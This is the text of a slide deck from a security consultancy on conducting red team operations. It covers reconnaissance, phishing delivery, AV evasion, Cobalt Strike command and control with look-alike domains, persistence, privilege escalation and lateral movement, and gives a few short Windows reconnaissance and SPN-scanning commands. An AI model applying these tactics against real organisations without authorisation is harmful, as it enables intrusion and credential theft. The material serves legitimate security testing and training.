Taking security a step further Red Team operations
ME 2 Geek 20 year of experience doing hacking Authored tools / articles / books / etc Speaker at conferences around the world Volunteer at OWASP Still getting the same thrill when compromising a host CEO at SECFORCE
SECFORCE 3 IT Security Consultancy – penetration testing Highly specialised in offensive security Teams located in London (UK) and Malta Penetration Testing Incident Response Red Team Testing Blockchain security
0 Agenda
Agenda 5 1 Introduction 2 Why Red Teaming 3 How is a Red Team operation conducted 4 Questions and answers
1 Introduction
7
Taking security a step further Red Team operations
DEFENSIVE OFFENSIVE 9
DEFENSIVE OFFENSIVE 10 AV and Firewall vendors Penetration Testing Blue Team, sysadmins, etc Red Team SIEM, IDS, IPS, etc. A lot more fun! :-)
PENETRATION TESTING RED TEAM 11
PENETRATION TESTING RED TEAM 12 Specific target – narrow scope Wider scope Aiming for full coverage of issues Stealth attack Stealth is not important Assess controls such as incident response, Assess the security controls such as patch monitoring, network sensors, user security management, password policies, access awareness, etc. control, etc Sophisticated attacks Longer engagements
WHAT IS A RED TEAM OPERATION? 13 Assessment to identify the resilience of an organisation to highly sophisticated targeted attacks A team of attackers performs an attack to help the target organisation to identify weaknesses in their defensive mechanisms Some of these exercise may replicate attacks such as: Hacktivists Ransomware attacks State sponsored threat actors
2 Why Red Teaming?
Why performing a Red Team assessment? 15
Why performing a Red Team assessment? 16 How else would an organisation know their resilience? Regulatory compliance Assess security holistically, instead of in isolation Assess user security awareness Train a blue team
3 How is a Red Team conducted?
18
19
INFRASTRUCTURE STAFF 20
INFRASTRUCTURE STAFF 21 Identification of security holes Spear phishing attacks Critical issues affecting the perimeter Development systems? UAT? Etc. Misconfigurations, etc.
OUTSIDE INSIDE 22
OUTSIDE INSIDE 23 External reconnaissance Network awareness Assessment of the perimeter Persistence Identify target users for phishing Understanding the current security controls Identification of misconfigurations Goal: Network foothold Privilege escalation
Tools 24 Cobalt Strike Empire Powershell (Microsoft’s Post -Exploitation Language ;-) ) PowerView, PowerUp, PowerSploit Custom scripts Living off the land WMI WinRM GPO Nmap and Nessus (only for external testing)
Methodology 25 Detective work Design an attack Deliver the attack
User Reconnaissance 26 Look for: emails, departments, files (metadata), user/domain names, password dumps, ex-employees.. Google-fu Social media The harvester Maltego FOCA Threat Intelligence
Infrastructure Reconnaissance 27 Goal: Get a list of IP addresses / domain to target Google-fu Whois DNS bruteforce SSL certificates review Web crawling, etc.
Infrastructure Assessment 28 Goal: Identification of RCE issues such as misconfigured Tomcat, SQLi, SMTP relays, shellshock, hearbleed, etc Nmap (common ports) Nessus Standard penetration testing tools Commonly conducted over VPN
Phishing 29 Recon gave us emails, departments and ideas Profiling Prepare pretexts (domains, mail server, sites, etc) Delivery: Macros or Java usually but others exist (hta, js, sct files) Password protected zip files Payload: Cobalt Strike Beacon Spoofing? SPF + DKIM + mail relays Mail filters? MX records and NDR help!
Phishing 30
Phishing - profiling 31
Phishing - profiling 32
Phishing payload creation 33 We have a good understanding of the target Choose the angle of attack AV bypass Communication channels to C2 server
AV evasion 34
Delivery – office macro 35
Delivery – Java Applet 36
Command & Control 37 HTTP(S) Beacon is proxy aware but some proxies inflict pain :( DNS Beware of command output! Totally legit domains: static-jquery.com, msn-cdn.com, onedrive-live.co.uk Web filtering checks domain reputation based on age, etc Cobalt Strike Malleable C2
Malleable C2 profile 38
Gaining a network foothold! 39
Gaining a network foothold! 40
OUTSIDE INSIDE 41
We are in! Now what? 42 Situational awareness whoami /groups process list + steal_token (explorer.exe) powershell $PSVersionTable.PSVersion net start | findstr -i "protect vir “ systeminfo | find "Boot Time“ echo %temp% & time /t Watch out for network monitoring Only be interactive when you need to sleep 10
Wait! Let’s be safe! 43
Persistence 44 We need to survive reboot Don’t want to phish again Persist on workstations, not servers Typical methods: Registry Scheduled tasks WMI (requires admin) VPN (requires creds)
Persistence - Registry 45
Persistence – Scheduled tasks 46
Persistence – WMI 47
Privilege escalation + lateral movement 48 They go hand in hand Priv esc goals Local Admin -> Domain Admin (of course) Domain User -> Domain User with access to target system Lateral movement goals Our box -> key workstation -> target system Our box -> box that leads to compromise of higher priv user Our box - > box that leads to box that leads to box… General goal: remain undetected
Privilege escalation tactics 49 PowerUp GPP files Clear text passwords in files/scripts/shares Monitor users Inveigh / Responder General misconfigurations Abuse of common practices Users often have a low + high priv account
Capturing password hashes 50
Lateral movement tactics 51 User hunting Find more interesting users Find out where they are logged in Can we log in there? Steal their token/creds Repeat Tools for this include PowerView’s UserHunter Bloodhound
Bloodhound 52
Lateral movement tactics (continued) 53 SMB comms for pivoting Not psexec, use wmic/winrm dir c:\ is often enough to check privs runas /user:domain\user cmd Don’t portscan, query the domain - SPN scanning
Lateral movement tactics (continued) 54 setspn -Q */* (query all SPNs) setspn -L <server/user> (query specific SPN) setspn – L MSSQLSvc
Summary 55
56
4 Questions?
Thank you! rodrigo.marcos@secforce.com
Recommend
More recommend